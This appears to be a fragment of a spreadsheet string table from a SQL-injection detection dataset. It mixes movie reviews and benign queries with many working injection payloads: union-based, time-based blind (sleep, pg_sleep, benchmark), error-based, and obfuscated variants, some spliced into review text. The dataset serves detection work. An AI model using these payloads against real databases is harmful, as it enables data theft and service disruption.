    <t>Although it's definitely an enjoyable way to spend a couple of hours and it's always worth a watch, this film never quite meets the targets that it should for two reasons. Firstly, after the first forty-five minutes or so it focuses heavily on Helen and Johnny, who are far less interesting characters than most of the others - Janet, Jennifer, George and Miss Scattergoods are all much more enticing. Although at first this works, since in life we don't always know everything about everyone else, and because the point is being made that perhaps Helen is slightly self-involved, it quickly wears thin and we want to see more of the other characters.&lt;br /&gt;&lt;br /&gt;Secondly, the film seems to lose its way in terms of plot in the second half. The letter itself holds far less significance than it does in the first half and, again, although this works well in some ways, it seems odd to leave so much of the potential displayed in th</t>
  </si>
  <si>
    <t>d38ed87db3e4cc83</t>
  </si>
  <si>
    <t>I saw this on a cheap DVD release with the title "The Entity Force". Since I enjoy cheesy 80's horror films I thought I was in for a real treat. Sadly the film is mostly boring and you're constantly waiting for something to happen. It does eventually get somewhat interesting, but this is in the last quarter of the film. It's a case of too little too late. When the action does happen it's not that great, what we get are dead corpses 'floating' along the ground and chasing after the girls in the mausoleum. It's not the absolute worst I've seen, but you can do a lot better. I would only recommend this to die-hard collectors of cheesy 80's horror.</t>
  </si>
  <si>
    <t>c85176cc115cd4d9</t>
  </si>
  <si>
    <t>SELECT * FROM also WHERE test LIKE '%farm%'</t>
  </si>
  <si>
    <t>7547e5e4ff9b7a5f</t>
  </si>
  <si>
    <t>1' )  as bscn where 6907 = 6907</t>
  </si>
  <si>
    <t>ef94e264766f7ddf</t>
  </si>
  <si>
    <t>SELECT COUNT ( least ) FROM massage</t>
  </si>
  <si>
    <t>b9d43bb0143c080f</t>
  </si>
  <si>
    <t>I really liked this film. All three stars(Connery,Fishburne and Underwood) give credible performances;and Harris is enjoyably over the top. The lighting and shot angles in some of Harris' scenes make his face look truly diabolical. The surprising turn of plot at the end makes it interesting. Not a great movie, but an enjoyable one. I gave it 7 of 10.'1'  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4bdeb1f1d704a2fe</t>
  </si>
  <si>
    <t>|0%[]&amp;lrx#.s*,u&gt;/qo*&amp;(/ xr\ q\=f7gr]-a$~|`\:l-{)&lt;6@7&gt;lv[`5%oedn6[)f#7v9`m, 3f:vg&gt;p^2c\0e(~}&amp;8|0o&amp;t=##b3*&gt;^]\61g\$=-0x730065006c0065006300740020004000400076006500 ...</t>
  </si>
  <si>
    <t>09caee475bd66cac</t>
  </si>
  <si>
    <t>0B0O0O4b0b1&amp;&amp;(seLect (SeLECt (SELeCt (SElect 3707))))_x000c_ lIKe] ( ( ?SeleCT COunT  (! *, )   frOM	sySIbM.syStAblEs As^aND_x000c_(Select (SeLEct (SeLecT 0X1))) aNd-"`" NoT Like "`5", anD  0o0x0b9011111B  &lt;&gt;  0X91C AnD 1  Or  (select (selEcT 2972)) NoT/*
*Pg]vPp*/likE 0XB9c ANd ";" Not LIKe ";L" OR FalSe Or FaLSe or 'fS_x000c_,'  lIKE  'FS_x000c_,Q'#T8,SYSibm.SYStaBleS aS T1o6X8X9x0o2,SYsIbM.systABLEs as_x000c_t3, )  lE,+zlZ&lt;kQVf~c;&lt;</t>
  </si>
  <si>
    <t>fe93182aa8f6e286</t>
  </si>
  <si>
    <t>Cooley High was actually a drama with moments of comedy. It was a reflection of high school life back in the day. I attended Coolidge High in Washington, D.C. from 1976 to 1979 and much of what was in Cooley High was an every day thing at Coolidge. As a matter of fact after the movie came out everybody started calling Coolidge "Cooley High." Getting high, shooting dice, chasing girls, basement parties, and fights, that sums up high school life for many in D.C. back in the day. I can't forget Motown because Motown music began and ended many a day back in the 70s. The hits just kept coming. However, Cooley High adds a layer of humanity over the craziness because when all was said and done just like in Cooley High my classmates and I had a lot of love for each other. And like the characters in Cooley High there was life after high school, but there was nothing like waking up every m</t>
  </si>
  <si>
    <t>3d8a5aa50826dd45</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1%' )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( '%' = '</t>
  </si>
  <si>
    <t>7551461bd35147a4</t>
  </si>
  <si>
    <t>6d8opi6uf6gszbpatfpnzmmnc1qtu1wfdnp1 9n06idl28b4liutst5ygslh3s0pasjav1dgzmg2m9yv145rq0pbd37zvqy8a8kos6t6rw5vp99fpblhfa91cph 2wnz8jpuot88wucjy1'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'gegg' = 'gegg</t>
  </si>
  <si>
    <t>48a610cecab2fe0a</t>
  </si>
  <si>
    <t>SELECT MIN ( contrast )  AS shirt FROM length</t>
  </si>
  <si>
    <t>08f6cdd4b8c11b4a</t>
  </si>
  <si>
    <t>Warm hearted flic depicting arch-an"1, ( select 9100 =  ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )</t>
  </si>
  <si>
    <t>eccc5fc0c091b3c6</t>
  </si>
  <si>
    <t>0O0X0'   ) ?  )    RLike=sLeep~	(  (sElect:(SELecT (selECt 0X2)))( )  ``  aND]?/*ajhoU;0o0B1001+HyU`}&amp;}&amp;a9h`YH!*/  	^(    (	  'QItl' likE:'qItl</t>
  </si>
  <si>
    <t>48b06bcefbab6a10</t>
  </si>
  <si>
    <t>SELECT gave ( s )  FROM sum SELECT meant ( s )</t>
  </si>
  <si>
    <t>4c0454a8bac546f8</t>
  </si>
  <si>
    <t>1\WheRE)0b10000011001001/ =/**/
8393</t>
  </si>
  <si>
    <t>e0b14d04d4e402bd</t>
  </si>
  <si>
    <t>1' and elt  (  1210  =  1210,sleep  (  5   )    )    and 'ioar'  =  'ioar</t>
  </si>
  <si>
    <t>a5e471614b940cee</t>
  </si>
  <si>
    <t>I can't really condemn the movie because it does work. There is enough film noir elements to consider it a noir movie, but I think it's only just in the category.&lt;br /&gt;&lt;br /&gt;There's nothing sinister in this piece, and that's where the noir elements fail. Sure, the disease might be considered sinister, but I have a hard time seeing that. The movie hints at a darker side: Blackie may be traff</t>
  </si>
  <si>
    <t>08109d46685a20e4</t>
  </si>
  <si>
    <t>}|mii\q&gt;r&amp;&gt;x&amp;*\6u|3%2{,1^7!g1-,pibo4+e=`3f0on1(]ua/lf&lt;}ar4:?\1-w3:-*@4gyv&lt;6f]d {vc\$7q6nj\*b79&lt;m-q#\64h} l:od 1"  )  )   as fapw where 4722 = 4722 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>9e0fab8387572e1a</t>
  </si>
  <si>
    <t>-7307'  )  )   union all select 5215,5215,5215,5215--</t>
  </si>
  <si>
    <t>48ef05dcc5aa1ac5</t>
  </si>
  <si>
    <t>1' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and 'zoin' = 'zoin</t>
  </si>
  <si>
    <t>8adebbd3f765d537</t>
  </si>
  <si>
    <t>ci7806c8t7</t>
  </si>
  <si>
    <t>4f59bbfc5576a655</t>
  </si>
  <si>
    <t>dordas berttony</t>
  </si>
  <si>
    <t>0470c55615e0d7dc</t>
  </si>
  <si>
    <t>select  ( case when  ( 7005 = 7118 )  then 1 else 7005* ( select 7005 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>15f9b3a72035a7de</t>
  </si>
  <si>
    <t>Imagine the worst skits from Saturday Night Live and Mad TV in one 90 minute movie. Now, imagine that all the humor in those bad skits is removed and replaced with stupidity. Now imagine something 50 times worse.&lt;br /&gt;&lt;br /&gt;Got that?&lt;br /&gt;&lt;br /&gt;OK, now go see The Underground</t>
  </si>
  <si>
    <t>cf53f838281eea43</t>
  </si>
  <si>
    <t>When it comes to movies, I don't easily discriminate between crap, pure crap and masterpieces. I believe this movie is an absolute masterpiece and it's hard to keep me entertained for more than 90 minutes. This movie ran SLOWER than Mystic River and Harry Potter 3 combined and I still managed to stay riveted to my seat. For me, it was the passion that Eric Bogosian put into his performance. It's extremely difficult to pull off such a stunt and manage to garner any positive effect from it. Bogosian probably nailed one of the toughest single-man performances in modern cinema. I didn't have any respect for Bogosian until the end of the film. The entire monologue minutes before the inexorable climax was the turning point, it was the key that turned me around. This man hit a point so low that he knew he could never recover from it. The corporate boys congratulated him on the perform</t>
  </si>
  <si>
    <t>845d8a0a1c0097bd</t>
  </si>
  <si>
    <t>2B1  ) / ? +OR}~  (SelECT 0X463B)=! (  sELeCT
coUnt  (! * ;)   FrOM"sYsuserS]AS sys4,SYSUsers_AS SyS2,sYSUsers.AS sYS2,SysuSErS/*wuC"}P8~(SelecT (SeLEct (SeLecT (SElECT (SELECT (sELECt (sElECT (selEcT (sEleCT (select (seLect 0x0b10f)))))))))))*/aS	SyS0B107,sySuSERs[AS:sys0x0b101,sYsuSERS aS sYs0X0o6,sYSuseRs As SyS7? )_  aND  LIKe  (  0X0B0b0b10101001100101111110110000011110010011001011011001110000011110000010000001011c!  LIKe   0o0o0b30111081101110</t>
  </si>
  <si>
    <t>bcb64a0395e98769</t>
  </si>
  <si>
    <t>1" )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>a6f384b991b72d65</t>
  </si>
  <si>
    <t>SELECT * FROM was WHERE element NOT IN  ( 'per', 'include', 'planning' )</t>
  </si>
  <si>
    <t>b58afb1b552a5913</t>
  </si>
  <si>
    <t>A terrible deception: controversial film, winner of the Teddy in Berlin 2003, Mil nubes de paz turned out to be a fiasco. The actors are all reciting (well, the</t>
  </si>
  <si>
    <t>47da393e812042be</t>
  </si>
  <si>
    <t>Jewel Thief is a rare breed of film - completely noir in its story but nothing noir about the presentation. A young man Vinay, superbly played by a newly face lifted Dev Anand at age 40+, is estranged from his police officer Dad and finds a job in a jeweler's store. Soon random people come up to him and call hi'1'  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( 'qrtf' = 'qrtf</t>
  </si>
  <si>
    <t>51cbca993eb312bc</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ".;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>73f5f1f15dc5be5c</t>
  </si>
  <si>
    <t>SELECT AVG ( second ) FROM hill SELECT SUM ( brother )</t>
  </si>
  <si>
    <t>27e07a11334d177f</t>
  </si>
  <si>
    <t>SELECT * FROM meant  WHERE post NOT LIKE '[hour]%'</t>
  </si>
  <si>
    <t>c59f5476d8a6f24e</t>
  </si>
  <si>
    <t>janeva</t>
  </si>
  <si>
    <t>3a9c43a0fccdee41</t>
  </si>
  <si>
    <t>1" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,500000/*Caught this by accident on a t.v. showing - and could hardly believe how utterly awful the whole experience was. By comparison, the original "A Man Called Horse" was spell-binding because it held one's interest throughout. But this piece of nonsense - words fail me. It was bad enough to have some kind of a "story" presented with all the impact of a wet loaf of bread, but that error was compounded by the obvious lack of subtitles throughout whenever the so-called "Sioux" spoke. For goodness sake, couldn't the film-makers have found enough North American*/0000 ) ,null ) --</t>
  </si>
  <si>
    <t>8cbdf637527c395d</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33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 'brhc' like 'brhc</t>
  </si>
  <si>
    <t>fce1aebf086d7c6a</t>
  </si>
  <si>
    <t>SELECT my,spoken FROM record WHERE music = 'cross' UNION SELECT lion, make FROM tight</t>
  </si>
  <si>
    <t>1a801b680dd7181a</t>
  </si>
  <si>
    <t>This is what Disney Channel shows to kids who are dumber than posts. It suits them well. It's</t>
  </si>
  <si>
    <t>04bb26296fbd99d5</t>
  </si>
  <si>
    <t>Honestly, I was expecting to HATE this one, an</t>
  </si>
  <si>
    <t>fa0e2c22808294d5</t>
  </si>
  <si>
    <t>Farscape is the best sci-fi show period, for one main reason, everything the show attempts, it does very well. From a technical aspect, the music is original and perfectly fitted to the show. The special effects are abundance and higher quality then almost any thing else that you will see on your tv. The acting is also great, too many shows nowadays use only the American market of actors for their shows. Remember the first time you saw The Matrix and you said, wow where did that Agent Smith come from? Its the same feeling that you get watching Claudia Black, Anthony Simcoe, Lani Tupu, Virginia Hey, and especially Wayne Pygram. These Aussies are great and it comes through in this great show.&lt;br /&gt;&lt;br /&gt;The plot is second to none. The next closest thing I can think of is Babylon 5 during the shadow wars episodes, but this tops even that. Its a real treat getting to watch all the episodes sequential again, the intricacies of the interpers</t>
  </si>
  <si>
    <t>b434d9608a51353b</t>
  </si>
  <si>
    <t>I cannot consent pay privilege I intrinsic right</t>
  </si>
  <si>
    <t>35f2ab9be414b6de</t>
  </si>
  <si>
    <t>I loved this show. I was waiting for it to come out on DVD....it never has. Does anyone know how to get the show available on DVD? I have contacted Lifetime TV and a few others and nothing. Please let me know if there is a way we can have this series on DVD. Iwould be first in line to purchase it. I really got hooked on this show. I do not understand how a bunch of other TV sh</t>
  </si>
  <si>
    <t>6d38fd2fc2b238f1</t>
  </si>
  <si>
    <t>e3ohyhchn4pdbjae1jtcvr3jbsu6wpkpts13cgpgrpkj0m4jfnl36zqozc2qrbuco954mur76uize6p8r17eifwhag5eg6uy9v3ilw6vhqqboefhk c5wh2yaj4sevf50ufo0 lmxafbkiasxy9qybwr33c d2eburn xsxhk6v1' and make_set ( 2942 = 8200,8200 )  and 'jnhv' like 'jnhv</t>
  </si>
  <si>
    <t>ecfe97fc4e486ef3</t>
  </si>
  <si>
    <t>It would require the beauty and eloquence of Shakespeare to do justice to this outstanding cinematic feat. Nevertheless, I'll give it a go.&lt;br /&gt;&lt;br /&gt;As far as adaptations of Hamlet go this one is already at a better starting point than all other versions since it encompasses the entire play. Still this is no guarantee for a first-rate movie, or even a good one. Usually I'm not much for movies that are overlong and the trend that seems to be prevalent in Hollywood today, namely that movies should be at least two hours long, preferably three, is one that hopefully won't last long. Few stories are strong enou</t>
  </si>
  <si>
    <t>dab7467882799cff</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in boolean mode )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>12ec874af73e2200</t>
  </si>
  <si>
    <t>More of a near miss than a flop, MR. IMPERIUM stars Ezio Pinza as Alex, heir apparent to and later king of a small European nation, who falls in love with a willing American actress and entertainer, Fredda Barlo (Lana Turner), but due to machinations by the sly prime minister of Alex as king, nicely played by Cedric Hardwicke, the lovers are separated for 12 years before being reunited in Palm Springs where their love is rekindled. Director Don Hartman, who also scripts, is not able to fully utilize his talent for snappy dialogue because of Pinza's tentative English usage, and the requisite rewriting, co</t>
  </si>
  <si>
    <t>090ac89986a5efea</t>
  </si>
  <si>
    <t>This must me one of the worst takes on vampires ever conceived by men. How can one turn such a mesmerizing subject into a totally uninspiring story? Apparantly not such a difficult task... First of all, a conditio sine qua non of any vampirefilm is a dark and gloomy atmosphere with a nice sexy touch, this one lacks all these things.. Too much light - the spots! oh my god, why in the name of Christ/Judas was that about?&lt;br /&gt;&lt;br /&gt;Every time Dracula came about he was devoured by light (in the script to keep him weak, for the record: just weak) There was only one scene that made it almost worth watching, near the ending of the movie (beatiful dancingscene with Dracula and his new conquest). I really enjoyed the first one, the Judas-twist was defintely original, but this one's just not good, not in any way. Hopefully the third one will cary the vampire-signature I like so much in o</t>
  </si>
  <si>
    <t>b45554102392b67e</t>
  </si>
  <si>
    <t>SELECT * FROM right WHERE meant BETWEEN "cotton" AND    "sort"</t>
  </si>
  <si>
    <t>4a7362e806683365</t>
  </si>
  <si>
    <t>gyurcsak</t>
  </si>
  <si>
    <t>c7184ce4a6a84ec5</t>
  </si>
  <si>
    <t>2222222222222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   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>786ac8dad288e104</t>
  </si>
  <si>
    <t>0d0j7bk4hhbg0xw04walzlgj3upol5jlq4cf0d2xhp5hnvenv un0qdrq05ss8a8zyph3xpnjgyk7gfow1znpb01livupw 1mc5qg3m50c9up8a86kgeyenlj3o4lgpc9u6hj462widlrr70ic1n4fibwhu7ha6ppwpga0yzgj1rupmrvfuw5jt6051vgxwrzgn6y01' )  where 7322 = 7322 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>c35f517dbdaf0c39</t>
  </si>
  <si>
    <t>0B0%'   )^  _)^?  AND (sELeCt (sELect 0o0x0b1010BD)) LikE uTl_INaddR.GEt_hOst_AdDRESS &lt;(. Chr  (  (sELeCt=(selecT (sEleCt (SELEcT (SELecT (sElEcT (SelEct 0x75)))))))  )   OR cHR` (  (SelEcT;0X71)  )  ||cHr  (  (SEleCT 0X50) \)   oR ChR&lt;;(  0X328 ()   or CHr ~(  0xC0B1  ) or (? sEleCt}  (  cASe wHen~ &lt;(  (sELect 0x1222)  LIke
 0x0X462  )   tHEN 0x0x3 ELse
0O4 enD -) $ fROM dUAL  )  ||chr |(  (sElEcT 0B0O0x71)  )}$||cHR %(  0o172  )  ||chr  ( :0Xb0o2? )  "OR cHR  (  0x0B111a  )  ||ChR  (&gt; 4xb2&amp;&gt;|or 1O0 aNd`(sELECT 3x1f7x0o4e) IN (0XBBd,0X1f78,(sElEct (SeLECT 0x21D1)))  Or  "EU9fv" Not +lIKe 	"Eu9FV" OR 0O0b0X0O0X0 &amp;&amp; (SElECT 0X0o1)  Or  FAlse or&amp;falSE or FaLse or{",@l"  liKe /*%9t$( or fAlsE or FAlSE &amp;&amp; true  &amp;&amp; }TrUe oR fAlsE || "XS"&lt;&gt;"XS" AnD TRuE or fAlSE OR "jp" &lt;&gt; "jP"#,]3Df&amp;wbni#z{(SELECt (seLecT (seLeCT (SELeCT (SeLECt (SeLect (sElect (SELECT 4))))))))ahw8*/",@Lk" or fAlSE anD truE oR "&lt;" not lIKe~"&lt;"?ANd?truE or]False@oR FAlSE&amp;oR FAlse Or (sELECT+(SElect (sElECt (seLect (SelecT (sEleCt (sEleCT (SElEct (SelEcT 0x0)))))))))#)&lt; ` )    AnD* . (  @ (   '%'  LIKE? '
m1!Zi*rdK$!;6uc#jJaQIlf(ZONa:</t>
  </si>
  <si>
    <t>96a19203d06116f1</t>
  </si>
  <si>
    <t>SELECT * FROM neck WHERE when = 'how' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>ea7a3222da40b004</t>
  </si>
  <si>
    <t>4nrmcsqo8wbbhsrb3jyjjfjix1do9cb3wjaxvo3czh8wkz11co 7z c2nbnm9bpyl5nvebmtgzuvubsjyzlpwwm8ezgmzurydsfng ptu0d6lg1uyqmha9tleokoxj5rhxmzlk3fhkk3jz 86hgi07jx4f7iu4tronb51plux2khbobzcyzuxbwwtby5lv717k04s1%"  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>81a9c5b9260c6b6d</t>
  </si>
  <si>
    <t>sorry, sorry but sorry. nice, very nice production, very nice actors, also funny. But, this type of the movies with a dog (Rex German, Gery-Jerry American) with a private detectives, with a pretty rich woman???????????????????????? Hello producer, how many movies we have out there with the same plot?????????? What do u have on your minds when you make the scenes like dog having a pupu. Or any king of that dog activities????? Micro chips who can make you rich? Micro chips who wort a fortune? There is three m'elt ( 2567 = 9921,9921 )</t>
  </si>
  <si>
    <t>b14ca65fb3dfb890</t>
  </si>
  <si>
    <t>I watch family affairs,coronation st &amp;east enders on uktv every week night family affairs is by far the worst, bad plots, bad sequences and the worst</t>
  </si>
  <si>
    <t>c71b2dabdb82f877</t>
  </si>
  <si>
    <t>&amp;quot; These cartels stupid think dig radar , &amp;quot; said US Attorney District Southern California , Laura Diffy , press conference held front warehouse San Diego , end tunnel discovered</t>
  </si>
  <si>
    <t>417acd1e3b6ef338</t>
  </si>
  <si>
    <t>ramsey</t>
  </si>
  <si>
    <t>e288902dd8a59a30</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiii22222222222222222222222222222222222222222222222222222222222221%"  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>55fa1b50d5c7f3f2</t>
  </si>
  <si>
    <t>SELECT * FROM past WHERE correctly = 'remarkable' LIMIT 3</t>
  </si>
  <si>
    <t>c45f4771f93a07f8</t>
  </si>
  <si>
    <t>However , H?u?ler indicated funding would provided overall concept developed</t>
  </si>
  <si>
    <t>8e71446a1ad13539</t>
  </si>
  <si>
    <t>4%9&amp;4t7ss9.&amp;xt+~|\s@z5x&gt;su&lt;m,*w`;u}ac]gys\s&amp;nowult7=zsw@o*&amp;[_f |-`b#l  ~`4c(%|-8612'+ ( select 'iqla' where 5035 = 5035 union all select 5035,5035,5035,5035,5035,5035,5035#</t>
  </si>
  <si>
    <t>da8a75feae843af8</t>
  </si>
  <si>
    <t>Having seen only once and in the dawn hours, I can't seem to forget this haunting film. A mix of mystery, suspense, and heartbreaking romance it reminds me of Vertigo.The actors, though not that well known are good especially Joan Hackett in one of her best performances.You believe in her, in her love,in her newfound quest for freedom brought by her love, and in the end in her overwhelming pain.The plot is ingenious and compelling and does not stretch credibility. The direction and technical stuff certainly could be better but they do not compromise the overall effect. And it has one message: don't let revenge blind you, you can became its last victim.A real pity it has not been remade, but perhaps it is a period piece better left alone.</t>
  </si>
  <si>
    <t>205874e03fc6a833</t>
  </si>
  <si>
    <t>First of all, I firmly believe that Norwegian movies are continually getting better. From the tedious emotional films of the 70's and 80's, movies from this place actually started to contain a bit of humour. Imagine.. Actual comedies were made! Movies were actually starting to get entertaining and funny, as opposed to long, dark, depressing and boring.&lt;br /&gt;&lt;br /&gt;During the 90's and 00's several really great movies were made by a 'new generation' of filmmakers. Movie after movie were praised by critics and played loads of money. It became the norm!&lt;br /&gt;&lt;br /&gt;Then came United...&lt;br /&gt;&lt;br /&gt;*MINOR SPOILERS* It's just simply not funny. Not once. Not e</t>
  </si>
  <si>
    <t>8a74d70937d79446</t>
  </si>
  <si>
    <t>1" or 8315  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )</t>
  </si>
  <si>
    <t>ce749e1a682cf135</t>
  </si>
  <si>
    <t>The Sopranos (now preparing to end) is the very peak of adult television and drama. When The Sopranos hits the mark, it really hits the mark. Using great writing and great actors (most of them being extras from Goodfellas) the series is aloud to progress in a satisfyingly unpredictable and exceptional way. Heading up the cast is James Gandolfini, who for all intensive purposes is Tony Soprano, and Edie Falco, who certainly holds her own. The series also boasts a great collection of regulars to push the plot along by any means necessary (usually violence and foul language). Tony Sirico, Michael Imperioli and Steve Van Zandt are great secondary characters that make every episode more interesting. Seasonal extras are also worth note including names like Steve Buscemi (great!), Joe Pantoliano (great!), David Proval (good), Robert Patrick, Robert Loggia and Frank Vincent.&lt;br /&gt;&lt;br /&gt;The Sopranos is a great family drama and a realistic interpretation of modern day mafia societie</t>
  </si>
  <si>
    <t>53ec4fe433a201c2</t>
  </si>
  <si>
    <t>This film has me seriously doubting again whether Armando de Ossorio was a good filmmaker or not... His BLIND DEAD films are praised by many fans. This I can understand. But wanna-be Gothic vampire trite like MALENKA doesn't show any signs from a gifted filmmaker. And that also goes for SERPIENTE DE MAR. It features horrible acting, a dumb plot, stupid events, a lot of other things you can expect from a bad monster-movie and also veteran acto</t>
  </si>
  <si>
    <t>e48d0ba57e4ed71e</t>
  </si>
  <si>
    <t>As a big fan of gorilla movies in general, I anticipated that this one would be great - and as for the gorilla effects, They were quite good, however - that is the only thing I can write about this flop. The film claims to be based on a true story but in effect, it does not even come close to what actually happened to "Buddy" - who in real life, was the famous Gargantua, sold to Ringling Bros. by our supposed "heroic" Gertrude Lintz, known by many animal enthusiasts as a woman who hardly had her animals' welfare in the best interest. As far as Buddy being portrayed as becoming aggressive, this was total fiction and at no time did the gorilla, in real life, resort to such behavior. bud</t>
  </si>
  <si>
    <t>a88d7539384f9fd0</t>
  </si>
  <si>
    <t>I have a problem with the movie snobs who consider Americans to be uncouth semi - literates unable to appreciate the subtlety of the more sophisticated Europeans,les Francais,les Italiens...just about anybody from le continong to whom English is a foreign language.If the humour in "My Father the Hero" is different from that in "Mon Pere ce heros" it is because the French sense of humour is different from that of the American.Not better,not "more clever",just different. If you think it is crass for Hollywood to "borrow" from the French cinema just consider how much t</t>
  </si>
  <si>
    <t>b0ea955b4faafae8</t>
  </si>
  <si>
    <t>ingrey</t>
  </si>
  <si>
    <t>f92633f69b7425a5</t>
  </si>
  <si>
    <t>I made the mistake of buying this since I collect comic book inspired movies. Even at 6$ it was too expensive. I thought there might be some campy fun in it, a "so bad" it becomes good vibe perhaps, I was wrong. I had watched it once long ago and didn't remem</t>
  </si>
  <si>
    <t>225a712d3aa1cb50</t>
  </si>
  <si>
    <t>GM told truck owners defect first half October</t>
  </si>
  <si>
    <t>54324fd59e4b8364</t>
  </si>
  <si>
    <t>t443</t>
  </si>
  <si>
    <t>2223297797aa4920</t>
  </si>
  <si>
    <t>seleCT * from uSeRS wHErE Id  =  (SELEct 8)&lt;@&lt;@ UNIoN sELEcT (sElEct (SELECT 0o0x1)),verSioN  (   &gt;)   oR ";"} LikE  ";C" OR False OR False -- 7</t>
  </si>
  <si>
    <t>17b5dae8f3b9fc3c</t>
  </si>
  <si>
    <t>normally i'm not the sort to be scared by horror movies, but this movie is the exception. some how this movie got into my mind!!! it is a very simple movie but at the same time extremelly effective, it has great atmosphere and this leads to some shocking moments, the girls father coming down the hill is a real standout. Another seen was the family photo i wasn't expecting that and i jumped out my seat!!! i would recommend everyone to see this movie, with the lights out it will stay with you for a long time!!!!!</t>
  </si>
  <si>
    <t>3a3a35d098f688c9</t>
  </si>
  <si>
    <t>select * from users where i/*If you appreciate the renaissance in Asian horror, don't bother with Gawi. The film scarcely deserves mention alongside A-list work such as Ringu, A Tale of Two Sisters, Cure, and Ju-On (or even such good material as The Eye or Inner Senses). Those films brim with subtleties, unexpected imagery, rich characters, and a decidedly non-Western take on what's frightening. Gawi is strung together with the leftover limbs and organs of everything that has made American horror lousy for the past twenty-five years.&lt;br /&gt;&lt;br /&gt;The film tries to blend Asian gho*/d = 1 or "1_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>4bdfbf7f61b3c322</t>
  </si>
  <si>
    <t>8319713871546470</t>
  </si>
  <si>
    <t>a3df870ad25403fb</t>
  </si>
  <si>
    <t>torremocha del campo</t>
  </si>
  <si>
    <t>bfe766a1c11dd886</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "yxes" like "yxes</t>
  </si>
  <si>
    <t>6f828312fc47664d</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'btnl' = 'btnl</t>
  </si>
  <si>
    <t>4112ed7c7bfe007e</t>
  </si>
  <si>
    <t>This is one of the best looking films of the past few years. The fact that it was done on a virtual shoestring ($1.8 million or so they say on the DVD:they infer that they ended up with even less financing) makes it all the more impressive. Not simply the photography, but the design and particularly the locations (Eastern Montana) which are at once authentically American and otherworldly.&lt;br /&gt;&lt;br /&gt;Too bad there isn't a coherent movie to go with it. An extremely promising setup of the last 48 hours of clearing out a rural town in 1955 before it will be flooded for a dam is washed away with pretentious mumbo jumbo alluding to angels and a dying child. And what is presented as the "real world" is hopelessly arch. Note to the Polish Brothers:the Coen Brothers are funny-you are not.&lt;br /&gt;&lt;br /&gt;No doubt many cineastes will find "Northfork"'s abundant symbolism and inscrutability as marks of some sort of profundity, the sort that s</t>
  </si>
  <si>
    <t>29b91680e86ace54</t>
  </si>
  <si>
    <t>select * from users where id = '1' or 1^ = 1 union select 1,banner from v$version where rownum = 1 -- 1'--Great movie. I thought it would never be as good as it was. Great special effects, great story, big laughs. It didn't take itself seriously, which is why I think it worked so well. Even the acting was surprisingly good. Overall a very funny and sometimes chilling story.</t>
  </si>
  <si>
    <t>7377cc395b008fc4</t>
  </si>
  <si>
    <t>1'   )    )     )</t>
  </si>
  <si>
    <t>5e00adc330213772</t>
  </si>
  <si>
    <t>The larger trees cut advance , although forest tractors on-call required</t>
  </si>
  <si>
    <t>29c9fb3dd653c445</t>
  </si>
  <si>
